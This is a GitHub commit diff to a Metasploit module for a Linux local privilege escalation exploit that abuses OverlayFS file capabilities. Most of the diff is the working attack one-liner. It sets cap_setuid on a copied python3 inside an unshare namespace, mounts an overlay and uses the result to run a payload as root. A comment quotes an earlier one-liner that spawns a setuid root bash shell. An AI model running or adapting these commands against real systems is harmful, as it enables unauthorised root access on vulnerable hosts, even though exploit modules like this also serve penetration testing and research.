Skip to content

Commit da86706

Browse files
author
Corey
committed
Fix unterminated string, fix directory for calling python copy
1 parent 22babe7 commit da86706

File tree

1 file changed

+5
-7
lines changed

1 file changed

+5
-7
lines changed

modules/exploits/linux/local/game_overlay_privesc.rb

Lines changed: 5 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -98,31 +98,29 @@ def execute_command(cmd, opts = {})
9898

9999
payload_dir = datastore['PayloadDir']
100100

101-
directories = %w[low up wrk mnt].flat_map {|e| "/tmp/main/#{e}"}
101+
directories = %w[l u w m].flat_map {|e| "/tmp/main/#{e}"}
102102

103103
# Should we make sure directory doesn't already exist?
104104

105105
directories.each do |dir|
106106
print_status "Creating directory #{dir}"
107107
cmd_exec "mkdir -p #{dir}"
108-
register_dir_for_cleanup dir
109108
end
109+
# register_dir_for_cleanup "/tmp/main/"
110110

111111

112112
write_file "/tmp/main/marv", generate_payload_exe
113113
#works move test to low, run unshare mount set cap, shell
114114

115-
print_status "Copying python"
116-
cmd_exec "cp /u*/b*/p*3 /tmp/main/low"
117-
118115
print_status "Starting new namespace, and running exploit..."
119116

120-
hack = "unshare -rm sh -c \"setcap cap_setuid+eip /tmp/main/low/python3; mount -t overlay overlay -o rw, lowerdir=/tmp/main/low, upperdir=/tmp/main/up, workdir=/tmp/main/work mnt && touch mnt/* && /tmp/main/up/python3 -c 'import os;os.setuid(0);os.system(\"chown root:root /tmp/main/low/marv && chmod+x /tmp/main/marv && /tmp/main/marv \")\" "
117+
hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0);os.system(\"chmod 4755 /tmp/main/marv && /tmp/main/marv\")' "
121118

122119
# g1vi original
123120
# "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
124121
print_status "Running exploit: '#{hack}' "
125-
cmd_exec hack
122+
puts cmd_exec_with_result(hack)
123+
126124
end
127125

128126
def exploit

0 commit comments

Comments
 (0)